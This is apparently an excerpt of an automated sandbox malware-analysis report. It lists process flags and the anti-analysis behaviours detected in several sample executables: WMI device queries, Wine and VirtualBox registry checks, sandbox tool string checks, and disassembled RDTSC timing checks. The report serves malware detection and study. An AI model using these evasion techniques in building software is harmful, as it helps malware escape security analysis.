Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013251001\5e54822fbe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: callmobile.exe PID: 1640, type: MEMORYSTR

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\explorer.exe	System information queried: FirmwareTableInformation

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe

API/Special instruction interceptor: Address: 7FFE2220E814

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: explorer.exe, 00000035.00000002.2955749272.00000000011A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE
Source: callmobile.exe, 0000001B.00000002.2962692398.0000000003171000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: explorer.exe, 00000035.00000002.2955749272.00000000011A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXEEXEEAD

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB2734 second address: EB2738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB957E second address: EB958E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8C7D0F0866h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB958E second address: EB95AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C7D0F21D9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9CCF second address: EB9CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8C7D0F0866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB9CD9 second address: EB9D0F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8C7D0F21C6h 0x00000008 jnl 00007F8C7D0F21C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jg 00007F8C7D0F21D2h 0x00000016 jmp 00007F8C7D0F21CCh 0x0000001b jnp 00007F8C7D0F21CCh 0x00000021 jne 00007F8C7D0F21C6h 0x00000027 jc 00007F8C7D0F21CCh 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBCB80 second address: EBCBE5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F8C7D0F087Fh 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007F8C7D0F0873h 0x00000013 nop 0x00000014 movsx edi, ax 0x00000017 push 00000000h 0x00000019 call 00007F8C7D0F0869h 0x0000001e jl 00007F8C7D0F0872h 0x00000024 jnp 00007F8C7D0F086Ch 0x0000002a push eax 0x0000002b jo 00007F8C7D0F0874h 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBCBE5 second address: EBCBEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBCBEB second address: EBCC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jne 00007F8C7D0F0875h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F8C7D0F086Eh 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jp 00007F8C7D0F0880h 0x00000020 jne 00007F8C7D0F087Ah 0x00000026 pop eax 0x00000027 add edx, dword ptr [ebp+122D36A7h] 0x0000002d push 00000003h 0x0000002f mov dword ptr [ebp+122D1C82h], ecx 0x00000035 push 00000000h 0x00000037 mov esi, dword ptr [ebp+122D1909h] 0x0000003d push 00000003h 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007F8C7D0F0868h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 00000016h 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 jl 00007F8C7D0F0869h 0x0000005f movsx edi, si 0x00000062 call 00007F8C7D0F0869h 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a jl 00007F8C7D0F0866h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBCC8F second address: EBCCBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F8C7D0F21D1h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBCCBD second address: EBCCCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F086Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBCCCC second address: EBCCEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBCCEB second address: EBCD25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F0875h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jng 00007F8C7D0F0866h 0x00000010 jmp 00007F8C7D0F0872h 0x00000015 popad 0x00000016 popad 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBCD25 second address: EBCD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop ecx 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBCD39 second address: EBCD3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBCD3F second address: EBCD45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBCD45 second address: EBCD49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBCDFC second address: EBCE00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBCE00 second address: EBCE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007F8C7D0F0872h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F8C7D0F0868h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 call 00007F8C7D0F0869h 0x0000002d pushad 0x0000002e jng 00007F8C7D0F086Ch 0x00000034 jbe 00007F8C7D0F0866h 0x0000003a push esi 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD026 second address: EBD033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD033 second address: EBD0A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F8C7D0F086Dh 0x0000000b jnc 00007F8C7D0F0866h 0x00000011 popad 0x00000012 popad 0x00000013 pop eax 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F8C7D0F0868h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e push 00000003h 0x00000030 mov dx, bx 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D32C1h], ecx 0x0000003b push 00000003h 0x0000003d je 00007F8C7D0F086Ch 0x00000043 or dword ptr [ebp+122D1A4Fh], ecx 0x00000049 push 8252EF36h 0x0000004e push ecx 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F8C7D0F086Fh 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD0A2 second address: EBD0A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD0A6 second address: EBD12A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xor dword ptr [esp], 4252EF36h 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F8C7D0F0868h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D320Ch], eax 0x0000002e jmp 00007F8C7D0F0879h 0x00000033 lea ebx, dword ptr [ebp+12450A7Ch] 0x00000039 xchg eax, ebx 0x0000003a jmp 00007F8C7D0F0876h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 jmp 00007F8C7D0F0871h 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EBD12A second address: EBD12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECDB49 second address: ECDB4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECDB4F second address: ECDB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDDD96 second address: EDDD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDDD9A second address: EDDD9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA4CD9 second address: EA4CEB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jns 00007F8C7D0F0866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EA4CEB second address: EA4D08 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8C7D0F21C6h 0x00000008 jmp 00007F8C7D0F21D3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDBB64 second address: EDBB6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDBB6A second address: EDBB74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDBB74 second address: EDBB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDBB78 second address: EDBB8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21CEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDBFB5 second address: EDBFB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
